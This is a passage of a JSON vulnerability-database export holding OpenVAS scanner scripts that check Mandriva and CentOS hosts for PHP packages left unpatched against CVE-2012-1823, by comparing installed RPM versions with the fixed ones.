((res = isrpmvuln(pkg:\"php-sysvsem\", rpm:\"php-sysvsem~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-sysvshm\", rpm:\"php-sysvshm~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-tidy\", rpm:\"php-tidy~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-tokenizer\", rpm:\"php-tokenizer~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-wddx\", rpm:\"php-wddx~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xmlreader\", rpm:\"php-xmlreader~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xmlwriter\", rpm:\"php-xmlwriter~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xsl\", rpm:\"php-xsl~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-zip\", rpm:\"php-zip~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-zlib\", rpm:\"php-zlib~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64php5_common5\", rpm:\"lib64php5_common5~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:39:12", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:1361412562310881180", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881180", "title": "CentOS Update for php53 CESA-2012:0547 centos5", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for php53 CESA-2012:0547 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2012-May/018617.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881180\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:34:07 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2012-1823\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"CESA\", value:\"2012:0547\");\n script_name(\"CentOS Update for php53 CESA-2012:0547 centos5\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php53'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"php53 on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"PHP is an HTML-embedded scripting language commonly used with the Apache\n HTTP Server.\n\n A flaw was found in the way the php-cgi executable processed command line\n arguments when running in CGI mode. A remote attacker could send a\n specially-crafted request to a PHP script that would result in the query\n string being parsed by php-cgi as command line options and arguments. This\n could lead to the disclosure of the script's source code or arbitrary code\n execution with the privileges of the PHP interpreter. (CVE-2012-1823)\n\n Red Hat is aware that a public exploit for this issue is available that\n allows remote code execution in affected PHP CGI configurations. This flaw\n does not affect the default configuration using the PHP module for Apache\n httpd to handle PHP scripts.\n\n All php53 users should upgrade to these updated packages, which contain a\n backported patch to resolve this issue. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"php53\", rpm:\"php53~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-bcmath\", rpm:\"php53-bcmath~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-cli\", rpm:\"php53-cli~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-common\", rpm:\"php53-common~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-dba\", rpm:\"php53-dba~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-devel\", rpm:\"php53-devel~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-gd\", rpm:\"php53-gd~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-imap\", rpm:\"php53-imap~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-intl\", rpm:\"php53-intl~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-ldap\", rpm:\"php53-ldap~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-mbstring\", rpm:\"php53-mbstring~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-mysql\", rpm:\"php53-mysql~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-odbc\", rpm:\"php53-odbc~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-pdo\", rpm:\"php53-pdo~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-pgsql\", rpm:\"php53-pgsql~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-process\", rpm:\"php53-process~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-pspell\", rpm:\"php53-pspell~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-snmp\", rpm:\"php53-snmp~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-soap\", rpm:\"php53-soap~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-xml\", rpm:\"php53-xml~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-xmlrpc\", rpm:\"php53-xmlrpc~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-11T11:07:48", "bulletinFamily": "scanner", "description": "Check for the Version of php", "modified": "2018-01-09T00:00:00", "published": "2012-07-30T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=881206", "id": "OPENVAS:881206", "title": "CentOS Update for php CESA-2012:0546 centos6 ", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for php CESA-2012:0546 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PHP is an HTML-embedded scripting language commonly used with the Apache\n HTTP Server.\n\n A flaw was found in the way the php-cgi executable processed command line\n arguments when running in CGI mode. A remote attacker could send a\n specially-crafted request to a PHP script that would result in the query\n string being parsed by php-cgi as command line options and arguments. This\n could lead to the disclosure of the script's source code or arbitrary code\n execution with the privileges of the PHP interpreter. (CVE-2012-1823)\n \n Red Hat is aware that a public exploit for this issue is available that\n allows remote code execution in affected PHP CGI configurations. This flaw\n does not affect the default configuration in Red Hat Enterprise Linux 5 and\n 6 using the PHP module for Apache httpd to handle PHP scripts.\n \n All php users should upgrade to these updated packages, which contain a\n backported patch to resolve this issue. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\";\n\ntag_affected = \"php on CentOS 6\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-May/018614.html\");\n script_id(881206);\n script_version(\"$Revision: 8336 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-09 08:01:48 +0100 (Tue, 09 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:45:13 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2012-1823\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2012:0546\");\n script_name(\"CentOS Update for php CESA-2012:0546 centos6 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-bcmath\", rpm:\"php-bcmath~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-common\", rpm:\"php-common~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-dba\", rpm:\"php-dba~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-embedded\", rpm:\"php-embedded~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-enchant\", rpm:\"php-enchant~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-intl\", rpm:\"php-intl~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-process\", rpm:\"php-process~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pspell\", rpm:\"php-pspell~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-recode\", rpm:\"php-recode~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-tidy\", rpm:\"php-tidy~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-zts\", rpm:\"php-zts~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-02T10:57:15", "bulletinFamily": "scanner", "description": "Check for the Version of php53", "modified": "2017-12-29T00:00:00", "published": "2012-07-30T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=881180", "id": "OPENVAS:881180", "title": "CentOS Update for php53 CESA-2012:0547 centos5 ", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for php53 CESA-2012:0547 centos5 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PHP is an HTML-embedded scripting language commonly used with the Apache\n HTTP Server.\n\n A flaw was found in the way the php-cgi executable processed command line\n arguments when running in CGI mode. A remote attacker could send a \n specially-crafted request to a PHP script that would result in the query\n string being parsed by php-cgi as command line options and arguments. This \n could lead to the disclosure of the script's source code or arbitrary code \n execution with the privileges of the PHP interpreter. (CVE-2012-1823) \n \n Red Hat is aware that a public exploit for this issue is available that \n allows remote code execution in affected PHP CGI configurations. This flaw \n does not affect the default configuration using the PHP module for Apache \n httpd to handle PHP scripts.\n \n All php53 users should upgrade to these updated packages, which contain a\n backported patch to resolve this issue. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\";\n\ntag_affected = \"php53 on CentOS 5\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-May/018617.html\");\n script_id(881180);\n script_version(\"$Revision: 8257 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-29 07:29:46 +0100 (Fri, 29 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:34:07 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2012-1823\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2012:0547\");\n script_name(\"CentOS Update for php53 CESA-2012:0547 centos5 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of php53\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"php53\", rpm:\"php53~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-bcmath\", rpm:\"php53-bcmath~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-cli\", rpm:\"php53-cli~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-common\", rpm:\"php53-common~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-dba\", rpm:\"php53-dba~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-devel\", rpm:\"php53-devel~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-gd\", rpm:\"php53-gd~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-imap\", rpm:\"php53-imap~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-intl\", rpm:\"php53-intl~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-ldap\", rpm:\"php53-ldap~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-mbstring\", rpm:\"php53-mbstring~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-mysql\", rpm:\"php53-mysql~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-odbc\", rpm:\"php53-odbc~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-pdo\", rpm:\"php53-pdo~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-pgsql\", rpm:\"php53-pgsql~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-process\", rpm:\"php53-process~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-pspell\", rpm:\"php53-pspell~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-snmp\", rpm:\"php53-snmp~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-soap\", rpm:\"php53-soap~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-xml\", rpm:\"php53-xml~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-xmlrpc\", rpm:\"php53-xmlrpc~5.3.3~7.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:37", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:1361412562310881206", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881206", "title": "CentOS Update for php CESA-2012:0546 centos6", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for php CESA-2012:0546 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2012-May/018614.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881206\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:45:13 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2012-1823\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"CESA\", value:\"2012:0546\");\n script_name(\"CentOS Update for php CESA-2012:0546 centos6\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n script_tag(name:\"affected\", value:\"php on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"PHP is an HTML-embedded scripting language commonly used with the Apache\n HTTP Server.\n\n A flaw was found in the way 